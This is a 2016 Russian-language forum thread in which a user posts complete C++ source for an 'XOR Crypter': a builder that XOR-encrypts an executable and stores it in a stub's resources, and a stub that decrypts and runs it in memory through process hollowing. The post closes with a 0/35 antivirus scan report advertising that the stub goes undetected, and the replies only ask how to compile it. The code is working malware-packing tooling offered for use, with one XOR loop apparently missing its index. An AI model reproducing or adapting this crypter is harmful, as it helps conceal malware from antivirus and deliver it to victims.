XOR Crypter

Тема в разделе "С++", создана пользователем rain.hf, 28 апр 2016.

  1. rain.hf Житель форума
    билдер

    Код:
    #include <iostream>
    #include <Windows.h>
    #include <fstream>
    #include <vector>
    #include <string>
    using namespace std;
    
    char * FB;
    DWORD fs;
    char output[MAX_PATH];
    char choice;
    DWORD dwBytesWritten = 0;
    char name[MAX_PATH];
    std::vector<char> file_data;
    void RDF()
    {
        DWORD bt;
                                
        cout << "Please enter the Path of the file \nIf the file is in the same folder as the builder\nJust type the file name with an extention\nEG: Malvare.exe\n";
        cout << "File Name: ";
        cin >> name;
        cout << "Enter output name: ";
        cin >> output;
        CopyFile("stub.exe", output/*L"Crypted.exe"*/, 0);
        cout << "\nGetting the HANDLE of the file to be crypted\n";
        HANDLE efile = CreateFileA(name, GENERIC_ALL,FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    
        cout << "Getting the File size\n";
        fs = GetFileSize(efile, NULL);
    
        cout << "The File Size is: ";
        cout << fs;
        cout << " Bytes\n";
        cout << "Allocating Memory for the ReadFile function\n";
        file_data.resize(fs);
        cout << "Reading the file\n";
    
    
        ReadFile(efile, (LPVOID)(file_data.data()), fs, &bt, NULL);
    
        CloseHandle(efile);
    
        if (fs != bt)
            cout << "Error reading file!" << endl;
    }
    
    void xor_crypt(const std::string &key, std::vector<char> &data)
    {
        for (size_t i = 0; i != data.size(); i++)
            data ^= key[i % key.size()];
    
        /*ofstream out("After_enc.dat");
        for (std::vector<char>::const_iterator it = data.begin(), itEnd = data.end(); it != itEnd; ++it)
            out << *it;*/
    }
    
    void choose_enc()
    {
    
        cout << "\n\nChoose encryption method: " << endl;
        cout << "1. N/A" << endl;
        cout << "2. Simple XOR" << endl;
        cin >> choice;
    }
    
    void enc()
    {
        cout << "Encrypting the Data\n";
    
        switch (choice)
        {
        case '1':
            break;
        case '2':
            {
                /*ofstream myfile("2.dat");
                for (std::vector<char>::const_iterator it = file_data.begin(), itEnd = file_data.end(); it != itEnd; ++it)
                    myfile << *it;*/
                xor_crypt("penguin", file_data); //Encrypt it
    
            }
            break;
            return;
        }
    }
    
    void WriteToResources(LPTSTR szTargetPE, int id, LPBYTE lpBytes, DWORD dwSize)
    {
        cout << "Writing Encrypted data to stub's resources\n";
        HANDLE hResource = NULL;
        hResource = BeginUpdateResource(szTargetPE, FALSE);
        //LPVOID lpResLock = LockResource(lpBytes);
        UpdateResource(hResource, RT_RCDATA, MAKEINTRESOURCE(id), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),(LPVOID)lpBytes, dwSize);
        EndUpdateResource(hResource, FALSE);
    }
    
    int main()
    {
        std::string key = "penguin";
        RDF();
        choose_enc();
        enc();
        file_data.push_back(choice);
        cout << fs << endl;
        WriteToResources(output, 10, (BYTE *)file_data.data(), file_data.size());
        cout << "Your File Got Crypted\n";
        system("PAUSE");
    }
    
    


    Стаб

    runpe.h
    Код:
    
    #include <Windows.h>
    #include <TlHelp32.h>
    #include <wchar.h>
    typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
    typedef BOOL(WINAPI * NtSetThreadContext)(HANDLE hThread, PCONTEXT lpContext);
    typedef LPVOID(WINAPI * callVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
    typedef LPVOID(WINAPI * callVirtualAllocEx)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
    typedef bool(WINAPI * callReadProcessMemory)(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
    typedef bool(WINAPI * callWriteProcessMemory)(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
    typedef HANDLE(WINAPI * callCreateToolhelp32Snapshot)(DWORD dwFlags, DWORD th32ProcessID);
    typedef HANDLE(WINAPI * callProcess32First)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
    typedef HANDLE(WINAPI * callProcess32Next)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
    
    
    
    
    void ExecFile(LPSTR szFilePath, LPVOID pFile)
    {
        PIMAGE_DOS_HEADER IDH;
        PIMAGE_NT_HEADERS INH;
        PIMAGE_SECTION_HEADER ISH;
        PROCESS_INFORMATION PI;
        STARTUPINFOA SI;
        PCONTEXT CTX;
        PDWORD dwImageBase;
        NtUnmapViewOfSection xNtUnmapViewOfSection;
        NtSetThreadContext xNtSetThreadContext;
        callReadProcessMemory xReadProcessMemory;
        callWriteProcessMemory xWriteProcessMemory;
        callVirtualAlloc xVirtualAlloc;
        callVirtualAllocEx xVirtualAllocEx;
        LPVOID pImageBase;
        int Count;
        IDH = PIMAGE_DOS_HEADER(pFile);
        if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
        {
            INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
            if (INH->Signature == IMAGE_NT_SIGNATURE)
            {
                RtlZeroMemory(&SI, sizeof(SI));
                RtlZeroMemory(&PI, sizeof(PI));
    
                if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
                {
                    xVirtualAlloc = callVirtualAlloc(GetProcAddress(GetModuleHandleA("kernel32.dll"), "VirtualAlloc"));
                    xVirtualAllocEx = callVirtualAllocEx(GetProcAddress(GetModuleHandleA("kernel32.dll"), "VirtualAllocEx"));
                    xReadProcessMemory = callReadProcessMemory(GetProcAddress(GetModuleHandleA("kernel32.dll"), "ReadProcessMemory"));
                    xWriteProcessMemory = callReadProcessMemory(GetProcAddress(GetModuleHandleA("kernel32.dll"), "WriteProcessMemory"));
                    CTX = PCONTEXT(xVirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
                    CTX->ContextFlags = CONTEXT_FULL;
                    if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
                    {
                        xReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
    
                        if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
                        {
                            xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
                            xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
                        }
    
                        pImageBase = xVirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
    
    
    
                        if (pImageBase)
                        {
                            xWriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
                            for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
                            {
                                ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
                                xWriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
                            }
                            xWriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
                            CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
    
                            xNtSetThreadContext = NtSetThreadContext(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetContextThread"));
                            xNtSetThreadContext(PI.hThread, LPCONTEXT(CTX));
    
                            ResumeThread(PI.hThread);
                        }
    
    
    
                    }
                }
            }
        }
        VirtualFree(pFile, 0, MEM_RELEASE);
    }
    
    main

    Код:
    #include <iostream>
    #include <Windows.h>
    #include <fstream>
    #include "Runpe.h"
    #include <vector>
    #include <string>
    using namespace std;
    
    
    int Rsize;
    
    
    std::vector<char> RData;
    
    void Resource(int id)
    {
        size_t Rsize;
    
        HRSRC hResource = FindResource(NULL, MAKEINTRESOURCE(id), RT_RCDATA);
        HGLOBAL temp = LoadResource(NULL, hResource);
        Rsize = SizeofResource(NULL, hResource);
        RData.resize(Rsize);
        memcpy((void*)RData.data(), temp, Rsize);  // replace &RData[0] with RData.data() if C++11
    }
    
    void xor_crypt(const std::string &key, std::vector<char> &data)
    {
        for (size_t i = 0; i != data.size(); i++)
            data ^= key[i % key.size()];
    }
    
    
    
    void enc()
    {
        switch (RData.back())
        {
        case '1':
            {
                std::ofstream out("1.txt");
            }
            break;
        case '2':
            {
                xor_crypt("penguin", RData);
            }
            break;
        }
        return;
    }
    
    
    
    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    {
    
        Resource(10);
        enc();
    
        LPVOID pFile;
        TCHAR szFilePath[1024];
    
        pFile = RData.data();
        if (pFile)
        {
            GetModuleFileNameA(0, LPSTR(szFilePath), 1024);
    
            ExecFile(LPSTR(szFilePath), pFile);
        }
        return 0;
    };
    



    Filename: Stub.exe
    Filesize: 309,50 kB
    Date: 2016-04-27 08:07:58
    MD5: 8a51b89c2da3f4acbac2ad0f68f17a02
    SHA1: 3d3165543d782c405eb768e4e34d47608b88a05c
    Status: Clean
    Rate: 0/35

    Details:
    Ad-Aware - File is clean
    A-Squared - File is clean
    Avast - File is clean
    AVG Free - File is clean
    AntiVir (Avira) - File is clean
    BitDefender - File is clean
    BullGuard - File is clean
    Clam Antivirus - File is clean
    COMODO Internet Security - File is clean
    Dr.Web - File is clean
    ESET NOD32 - File is clean
    eTrust-Vet - File is clean
    FortiClient - File is clean
    F-PROT Antivirus - File is clean
    F-Secure Internet Security - File is clean
    G Data - File is clean
    IKARUS Security - File is clean
    K7 Ultimate - File is clean
    Kaspersky Antivirus - File is clean
    McAfee - File is clean
    MS Security Essentials - File is clean
    NANO Antivirus - File is clean
    Norman - File is clean
    Norton Antivirus - File is clean
    Panda CommandLine - File is clean
    Panda Security - File is clean
    Quick Heal Antivirus - File is clean
    Solo Antivirus - File is clean
    Sophos - File is clean
    SUPERAntiSpyware - File is clean
    Trend Micro Internet Security - File is clean
    Twister Antivirus - File is clean
    VBA32 Antivirus - File is clean
    VIPRE - File is clean
    Zoner AntiVirus - File is clean

    Scan Result: https://scan.majyx.net/scans/result/a138fa1dbfe5b6431e2f17d61b38cdd17b429ee8
    Scan by MaJyx Scanner
     
    Последнее редактирование: 28 апр 2016
  2. MIXA066 Уважаемый пользователь
    Никогда не имел дела с VS как там компилировать/какой тип проекта выбирать?
     
  3. rain.hf Житель форума
    можешь не в VS собрать Dmeh-Smeh-Smeh!!! а так пустой
     